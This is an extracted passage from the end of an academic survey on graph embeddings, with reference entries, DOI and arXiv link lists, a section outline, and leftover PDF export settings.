Vaswani A, Shazeer N, Parmar N, Uszkoreit J, Jones L, Gomez AN, Kaiser L, Polosukhin I. 2017. Attention is all you need. In: Advances in Neural Information Processing Systems. Cambridge: MIT press, 5998–6008. Veličković P, Cucurull G, Casanova A, Romero A, Lio P, Bengio Y. 2017. Graph attention networks. arXiv preprint arXiv:1710.10903. Veyseh APB, Nguyen TH, Dou D. 2019. Graph based neural networks for event factuality prediction using syntactic and semantic structures. arXiv preprint arXiv:1907.03227. Vishwanathan SVN, Schraudolph NN, Kondor R, Borgwardt KM. 2010. Graph kernels. Journal of Machine Learning Research 11(Apr):1201–1242. Wang D, Cui P, Zhu W. 2016. Structural deep network embedding. In: Proceedings of the 22nd ACM SIGKDD International Conference On Knowledge Discovery And Data Mining. New York: ACM, 1225–1234. Wang M. 2017. Predicting rich drug-drug interactions via biomedical knowledge graphs and text jointly embedding. arXiv preprint arXiv:1712.08875. Wang P, Wu Q, Cao J, Shen C, Gao L, van den Hengel A. 2018. Neighbourhood watch: referring expression comprehension via language-guided graph attention networks. arXiv preprint arXiv:1812.04794. Wang P, Xu B, Wu Y, Zhou X. 2015. Link prediction in social networks: the state-of-the-art. Science China Information Sciences 58(1):1–38. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 57/62 https://arxiv.org/abs/1707.01475 https://arxiv.org/abs/1710.10903 https://arxiv.org/abs/1907.03227 https://arxiv.org/abs/1712.08875 https://arxiv.org/abs/1812.04794 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Wang Q, Mao Z, Wang B, Guo L. 2017a. Knowledge graph embedding: a survey of approaches and applications. IEEE Transactions on Knowledge and Data Engineering 29(12):2724–2743 DOI 10.1109/TKDE.2017.2754499. Wang S, Huang E, Cairns J, Peng J, Wang L, Sinha S. 2019a. Identification of pathways associated with chemosensitivity through network embedding. PLOS Computational Biology 15(3): e1006864 DOI 10.1371/journal.pcbi.1006864. Wang S, Qu M, Peng J. 2017b. Prosnet: Integrating homology with molecular networks for protein function prediction. In: Pacific Symposium on Biocomputing 2017. World Scientific, 27–38. Wang S, Tang J, Aggarwal C, Chang Y, Liu H. 2017c. Signed network embedding in social media. In: Proceedings of the 2017 SIAM International Conference on Data Mining. SIAM, 327–335. Wang X, Bo D, Shi C, Fan S, Ye Y, Yu PS. 2020a. A survey on heterogeneous graph embedding: methods, techniques, applications and sources. arXiv preprint arXiv:2011.14867. Wang X, Cui P, Wang J, Pei J, Zhu W, Yang S. 2017d. Community preserving network embedding. In: AAAI. 203–209. Wang Z, Ye X, Wang C, Cui J, Yu P. 2020b. Network embedding with completely-imbalanced labels. Epub ahead of print 3 February 2020. IEEE Transactions on Knowledge and Data Engineering DOI 10.1109/TKDE.2020.2971490. Wang Z, Zhang J, Feng J, Chen Z. 2014. Knowledge graph embedding by translating on hyperplanes. In: AAAI, Volume 14. 1112–1119. Wang Z, Zheng L, Li Y, Wang S. 2019b. Linkage based face clustering via graph convolution network. In: The IEEE Conference on Computer Vision and Pattern Recognition (CVPR). Piscataway: IEEE. Waradpande V, Kudenko D, Khosla M. 2020. Deep reinforcement learning with graph-based state representations. arXiv preprint arXiv:2004.13965. Watts DJ, Strogatz SH. 1998. Collective dynamics of ‘small-world’ networks. Nature 393(6684):440–442 DOI 10.1038/30918. Wei X, Xu L, Cao B, Yu PS. 2017. Cross view link prediction by learning noise-resilient representation consensus. In: Proceedings of the 26th International Conference on World Wide Web. International World Wide Web Conferences Steering Committee, 1611–1619. Weng Z, Zhang W, Dou W. 2020. Adversarial attention-based variational graph autoencoder. IEEE Access 8:152637–152645. White S, Smyth P. 2005. A spectral clustering approach to finding communities in graphs. In: Proceedings of the 2005 SIAM International Conference on Data Mining. SIAM, 274–285. Wilson RC, Hancock ER, Pekalska E, Duin RP. 2014. Spherical and hyperbolic embeddings of data. IEEE Transactions on Pattern Analysis and Machine Intelligence 36(11):2255–2269 DOI 10.1109/TPAMI.2014.2316836. Wold S, Esbensen K, Geladi P. 1987. Principal component analysis. Chemometrics and Intelligent Laboratory Systems 2(1–3):37–52 DOI 10.1016/0169-7439(87)80084-9. Wu C, Zhou Y, Tan L, Teng C. 2020. Link prediction based on graph embedding method in unweighted networks. In: 2020 39th Chinese Control Conference (CCC). 736–741. Wu Q, Zhang H, Gao X, He P, Weng P, Gao H, Chen G. 2019a. Dual graph attention networks for deep latent representation of multifaceted social effects in recommender systems. arXiv preprint arXiv:1903.10433. Wu Z, Pan S, Chen F, Long G, Zhang C, Yu PS. 2019b. A comprehensive survey on graph neural networks. arXiv preprint arXiv:1901.00596. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 58/62 http://dx.doi.org/10.1109/TKDE.2017.2754499 http://dx.doi.org/10.1371/journal.pcbi.1006864 https://arxiv.org/abs/2011.14867 http://dx.doi.org/10.1109/TKDE.2020.2971490 https://arxiv.org/abs/2004.13965 http://dx.doi.org/10.1038/30918 http://dx.doi.org/10.1109/TPAMI.2014.2316836 http://dx.doi.org/10.1016/0169-7439(87)80084-9 https://arxiv.org/abs/1903.10433 https://arxiv.org/abs/1901.00596 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Xiaojin Z, Zoubin G. 2002. Learning from labeled and unlabeled data with label propagation. Tech. Rep., Technical Report CMU-CALD-02–107. Carnegie Mellon University. https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.14.3864&rep=rep1&type=pdf. Xie M, Yin H, Wang H, Xu F, Chen W, Wang S. 2016. Learning graph-based poi embedding for location-based recommendation. Proceedings of the 25th ACM International on Conference on Information and Knowledge Management 25:15–24. Xiong C, Power R, Callan J. 2017. Explicit semantic ranking for academic search via knowledge graph embedding. In: Proceedings of the 26th International Conference on World Wide Web. International World Wide Web Conferences Steering Committee, 1271–1279. Xu L, Wei X, Cao J, Yu PS. 2017. Embedding of embedding (eoe): joint embedding for coupled heterogeneous networks. In: Proceedings of the Tenth ACM International Conference on Web Search and Data Mining. New York: ACM, 741–749. Xu X, Yuruk N, Feng Z, Schweiger TA. 2007. Scan: a structural clustering algorithm for networks. In: Proceedings of the 13th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. New York: ACM, 824–833. Xue Z, Li G, Wang S, Zhang C, Zhang W, Huang Q. 2015. Gomes: a group-aware multi-view fusion approach towards real-world image clustering. In: 2015 IEEE International Conference on Multimedia and Expo (ICME). Piscataway: IEEE, 1–6. Yamanishi Y, Araki M, Gutteridge A, Honda W, Kanehisa M. 2008. Prediction of drug-target interaction networks from the integration of chemical and genomic spaces. Bioinformatics 24(13):i232–i240 DOI 10.1093/bioinformatics/btn162. Yamanishi Y, Kotera M, Moriya Y, Sawada R, Kanehisa M, Goto S. 2014. Dinies: drug-target interaction network inference engine based on supervised analysis. Nucleic Acids Research 42(W1):W39–W45 DOI 10.1093/nar/gku337. Yan B, Wang C. 2020. Graphae: adaptive embedding across graphs. In: 2020 IEEE 36th International Conference on Data Engineering (ICDE). Piscataway: IEEE, 1958–1961. Yan Z, Ge J, Wu Y, Li L, Li T. 2020. Automatic virtual network embedding: a deep reinforcement learning approach with graph convolutional networks. IEEE Journal on Selected Areas in Communications 38(6):1040–1057 DOI 10.1109/JSAC.2020.2986662. Yanardag P, Vishwanathan S. 2015. Deep graph kernels. In: Proceedings of the 21th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. New York: ACM, 1365–1374. Yang B, Yih W-t, He X, Gao J, Deng L. 2014. Embedding entities and relations for learning and inference in knowledge bases. arXiv preprint arXiv:1412.6575. Yang C, Liu Z, Zhao D, Sun M, Chang E. 2015. Network representation learning with rich text information. In: Twenty-Fourth International Joint Conference on Artificial Intelligence. 2111–2117. Yang L, Xiao Z, Jiang W, Wei Y, Hu Y, Wang H. 2020. Dynamic heterogeneous graph embedding using hierarchical attentions. In: Jose JM, Yilmaz E, Magalhães J, Castells P, Ferro N, Silva MJ, Martins F, eds. Advances in Information Retrieval. Cham: Springer International Publishing, 425–432. Yang L, Zhan X, Chen D, Yan J, Loy CC, Lin D. 2019. Learning to cluster faces on an affinity graph. In: The IEEE Conference on Computer Vision and Pattern Recognition (CVPR). Piscataway: IEEE. Yang Y, Wang H. 2018. Multi-view clustering: a survey. Big Data Mining and Analytics 1(2):83–107 DOI 10.26599/BDMA.2018.9020003. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 59/62 https://arxiv.org/abs/https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.14.3864&rep=rep1&type=pdf http://dx.doi.org/10.1093/bioinformatics/btn162 http://dx.doi.org/10.1093/nar/gku337 http://dx.doi.org/10.1109/JSAC.2020.2986662 https://arxiv.org/abs/1412.6575 http://dx.doi.org/10.26599/BDMA.2018.9020003 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Yang Z, Cohen WW, Salakhutdinov R. 2016a. Revisiting semi-supervised learning with graph embeddings. arXiv preprint arXiv:1603.08861. Yang Z, Tang J, Cohen WW. 2016b. Multi-modal bayesian embeddings for learning social knowledge graphs. In: IJCAI. 2287–2293. Ye Y, Hou S, Chen L, Lei J, Wan W, Wang J, Xiong Q, Shao F. 2019. Out-of-sample node representation learning for heterogeneous graph in real-time android malware detection. In: Proceedings of the Twenty-Eighth International Joint Conference on Artificial Intelligence, IJCAI-19. International Joint Conferences on Artificial Intelligence Organization, 4150–4156. Ying R, Bourgeois D, You J, Zitnik M, Leskovec J. 2019. Gnn explainer: a tool for post-hoc explanation of graph neural networks. arXiv preprint arXiv:1903.03894. Ying R, He R, Chen K, Eksombatchai P, Hamilton WL, Leskovec J. 2018a. Graph convolutional neural networks for web-scale recommender systems. arXiv preprint arXiv:1806.01973. Ying Z, You J, Morris C, Ren X, Hamilton W, Leskovec J. 2018b. Hierarchical graph representation learning with differentiable pooling. In: Advances in Neural Information Processing Systems. Cambridge: MIT press, 4805–4815. You J, Ying R, Ren X, Hamilton WL, Leskovec J. 2018. Graphrnn: a deep generative model for graphs. arXiv preprint arXiv:1802.08773. Yu W, Zheng C, Cheng W, Aggarwal CC, Song D, Zong B, Chen H, Wang W. 2018. Learning deep network representations with adversarially regularized autoencoders. In: Proceedings of the 24th ACM SIGKDD International Conference on Knowledge Discovery & Data Mining. Cambridge: ACM, 2663–2671. Yuan H, Ji S. 2020. Structpool: structured graph pooling via conditional random fields. In: International Conference on Learning Representations.. Yuan S, Wu X, Xiang Y. 2017. Sne: signed network embedding. In: Pacific-Asia Conference on Knowledge Discovery and Data Mining. Berlin: Springer, 183–195. Zeng H, Zhou H, Srivastava A, Kannan R, Prasanna VK. 2019. Graphsaint: graph sampling based inductive learning method. arXiv preprint arXiv:1907.04931. Zhai S, Zhang Z. 2015. Dropout training of matrix factorization and autoencoder for link prediction in sparse graphs. In: Proceedings of the 2015 SIAM International Conference on Data Mining. SIAM, 451–459. Zhang C, Ren M, Urtasun R. 2019. Graph hypernetworks for neural architecture search. In: International Conference on Learning Representations. ICLR.. Zhang D, Dai X, Wang X, Wang Y, Davis LS. 2018a. MAN: moment alignment network for natural language moment retrieval via iterative graph adjustment. arXiv preprint arXiv:1812.00087. Zhang D, Yin J, Zhu X, Zhang C. 2016a. Collective classification via discriminative matrix factorization on sparsely labeled networks. In: Proceedings of the 25th ACM International on Conference on Information and Knowledge Management. New York: ACM, 1563–1572. Zhang D, Yin J, Zhu X, Zhang C. 2016b. Homophily, structure, and content augmented network representation learning. In: 2016 IEEE 16th International Conference on Data Mining (ICDM). Piscataway: IEEE, 609–618. Zhang H, Shang X, Luan H, Wang M, Chua T-S. 2017. Learning from collective intelligence: feature learning using social images and tags. ACM Transactions on Multimedia Computing, Communications, and Applications (TOMM) 13(1):1. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 60/62 https://arxiv.org/abs/1603.08861 https://arxiv.org/abs/1903.03894 https://arxiv.org/abs/1806.01973 https://arxiv.org/abs/1802.08773 https://arxiv.org/abs/1907.04931 https://arxiv.org/abs/1812.00087 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Zhang H, Shang X, Luan H, Yang Y, Chua T-S. 2015. Learning features from large-scale, noisy and social image-tag collection. In: Proceedings of the 23rd ACM International Conference on Multimedia. New York: ACM, 1079–1082. Zhang H, Zheng T, Gao J, Miao C, Su L, Li Y, Ren K. 2019b. Towards data poisoning attack against knowledge graph embedding. arXiv preprint arXiv:1904.12052. Zhang H, Zhou J, Li R. 2020. Enhanced unsupervised graph embedding via hierarchical graph convolution network. Mathematical Problems in Engineering 2020(6):1–9 DOI 10.1155/2020/5702519. Zhang J, Shi X, Zhao S, King I. 2019c. STAR-GCN: stacked and reconstructed graph convolutional networks for recommender systems. arXiv preprint arXiv:1905.13129. Zhang Q, Wang H. 2016. Not all links are created equal: an adaptive embedding approach for social personalized ranking. In: Proceedings of the 39th International ACM SIGIR Conference on Research and Development in Information Retrieval. New York: ACM, 917–920. Zhang W, Fang Y, Liu Z, Wu M, Zhang X. 2020a. Mg2vec: learning relationship-preserving heterogeneous graph representations via metagraph embedding. IEEE Transactions on Knowledge and Data Engineering 1. https://ieeexplore.ieee.org/abstract/document/9089251. Zhang W, Shang R, Jiao L. 2020. Complex network graph embedding method based on shortest path and moea/d for community detection. Applied Soft Computing 97:106764. Zhang Y, Chen X. 2018. Explainable recommendation: a survey and new perspectives. arXiv preprint arXiv:1804.11192. Zhang Y, Wang D, Zhang Y. 2019d. Neural IR meets graph embedding: a ranking model for product search. arXiv preprint arXiv:1901.08286. Zhang Z, Bu J, Ester M, Zhang J, Yao C, Li Z, Wang C. 2020b. Learning temporal interaction graph embedding via coupled memory networks. In: Proceedings of the Web Conference 2020, WWW ’20. New York: Association for Computing Machinery, 3049–3055. Zhang Z, Cui P, Zhu W. 2018. Deep learning on graphs: a survey. arXiv preprint arXiv:1812.04202. Zhao G, Li J, Wang L, Qian X, Fu Y. 2019. Graphseq2seq: graph-sequence-to-sequence for neural machine translation. https://openreview.net/forum?id=B1fA3oActQ. Zhao X, Chang A, Sarma AD, Zheng H, Zhao BY. 2013. On the embeddability of random walk distances. Proceedings of the VLDB Endowment 6(14):1690–1701 DOI 10.14778/2556549.2556554. Zhao Y, Liu Z, Sun M. 2015. Representation learning for measuring entity relatedness with rich information. In: Twenty-Fourth International Joint Conference on Artificial Intelligence. 1412–1418. Zhao Z, Yang Q, Cai D, He X, Zhuang Y. 2016. Expert finding for community-based question answering via ranking metric network learning. In: IJCAI. 3000–3006. Zheng D, Ma C, Wang M, Zhou J, Su Q, Song X, Gan Q, Zhang Z, Karypis G. 2020a. Distdgl: distributed graph neural network training for billion-scale graphs. arXiv preprint arXiv:2010.05337. Zheng VW, Cavallari S, Cai H, Chang KC-C, Cambria E. 2016. From node embedding to community embedding. arXiv preprint arXiv:1610.09950. Zheng W, Wang D, Song F. 2020. Opengraphgym: a parallel reinforcement learning framework for graph optimization problems. In: Krzhizhanovskaya VV, Závodszky G, Lees MH, Dongarra JJ, Sloot PMA, Brissos S, Teixeira J, eds. Computational Science—ICCS 2020. Cham: Springer International Publishing, 439–452. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 61/62 https://arxiv.org/abs/1904.12052 http://dx.doi.org/10.1155/2020/5702519 https://arxiv.org/abs/1905.13129 https://arxiv.org/abs/https://ieeexplore.ieee.org/abstract/document/9089251 https://arxiv.org/abs/1804.11192 https://arxiv.org/abs/1901.08286 https://arxiv.org/abs/1812.04202 https://arxiv.org/abs/https://openreview.net/forum?id=B1fA3oActQ http://dx.doi.org/10.14778/2556549.2556554 https://arxiv.org/abs/2010.05337 https://arxiv.org/abs/1610.09950 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Zheng X, Ding H, Mamitsuka H, Zhu S. 2013. Collaborative matrix factorization with multiple similarities for predicting drug-target interactions. In: Proceedings of the 19th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. New York: ACM, 1025–1033. Zhong J, Li N, Kong W, Liu S, Li TH, Li G. 2019. Graph convolutional label noise cleaner: train a plug-and-play action classifier for anomaly detection. arXiv preprint arXiv:1903.07256. Zhong J, Qiu H, Shi B. 2020. Dynamics-preserving graph embedding for community mining and network immunization. Information-An International Interdisciplinary Journal 11(5):250. Zhou C, Liu Y, Liu X, Liu Z, Gao J. 2017. Scalable graph embedding for asymmetric proximity. In: AAAI. 2942–2948. Zhou K, Michalak TP, Rahwan T, Waniek M, Vorobeychik Y. 2018. Adversarial link prediction in social networks. arXiv preprint arXiv:1809.08368. Zhou S, Dai X, Chen H, Zhang W, Ren K, Tang R, He X, Yu Y. 2020. Interactive recommender system via knowledge graph-enhanced reinforcement learning. In: Proceedings of the 43rd International ACM SIGIR Conference on Research and Development in Information Retrieval, SIGIR ’20. New York: Association for Computing Machinery, 179–188. Zhou Y, Cheng H, Yu JX. 2009. Graph clustering based on structural/attribute similarities. Proceedings of the VLDB Endowment 2(1):718–729 DOI 10.14778/1687627.1687709. Zhu H, Lin Y, Liu Z, Fu J, Chua T-S, Sun M. 2019. Graph neural networks with generated parameters for relation extraction. In: Proceedings of the 57th Annual Meeting of the Association for Computational Linguistics. Florence: Association for Computational Linguistics, 1331–1339. Zhu S, Li J, Peng H, Wang S, Yu PS, He L. 2020a. Adversarial directed graph embedding. arXiv preprint arXiv:2008.03667. Zhu S, Yu K, Chi Y, Gong Y. 2007. Combining content and link for classification using matrix factorization. In: Proceedings of the 30th Annual International ACM SIGIR Conference on Research and Development in Information Retrieval. New York: ACM, 487–494. Zhu S, Zhou L, Pan S, Zhou C, Yan G, Wang B. 2020b. Gssnn: graph smoothing splines neural networks. In: AAAI. 7007–7014. Zhu Y, Xu Y, Yu F, Liu Q, Wu S, Wang L. 2020c. Deep graph contrastive representation learning. arXiv preprint arXiv:2006.04131. Zitnik M, Agrawal M, Leskovec J. 2018. Modeling polypharmacy side effects with graph convolutional networks. Bioinformatics 34(13):i457–i466 DOI 10.1093/bioinformatics/bty294. Zitnik M, Leskovec J. 2017. Predicting multicellular function through multi-layer tissue networks. Bioinformatics 33(14):i190–i198 DOI 10.1093/bioinformatics/btx252. Zitnik M, Zupan B. 2016. Collective pairwise classification for multi-way analysis of disease and drug data. In: Biocomputing 2016: Proceedings of the Pacific Symposium. World Scientific, 81–92. Zong N, Kim H, Ngo V, Harismendy O. 2017. Deep mining heterogeneous networks of biomedical linked data to predict novel drug-target associations. Bioinformatics 33(15):2337–2344 DOI 10.1093/bioinformatics/btx160. Zügner D, Akbarnejad A, Günnemann S. 2018. Adversarial attacks on classification models for graphs. arXiv preprint arXiv:1805.07984. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 62/62 https://arxiv.org/abs/1903.07256 https://arxiv.org/abs/1809.08368 http://dx.doi.org/10.14778/1687627.1687709 https://arxiv.org/abs/2008.03667 https://arxiv.org/abs/2006.04131 http://dx.doi.org/10.1093/bioinformatics/bty294 http://dx.doi.org/10.1093/bioinformatics/btx252 http://dx.doi.org/10.1093/bioinformatics/btx160 https://arxiv.org/abs/1805.07984 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Survey on graph embeddings and their applications to machine learning problems on graphs Introduction Preliminaries Methods for constructing graph embedding Specific embeddings based on network types Application of Graph Embeddings to Machine Learning Problems Applications to real-world problems Open problems Model comparison Results Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB 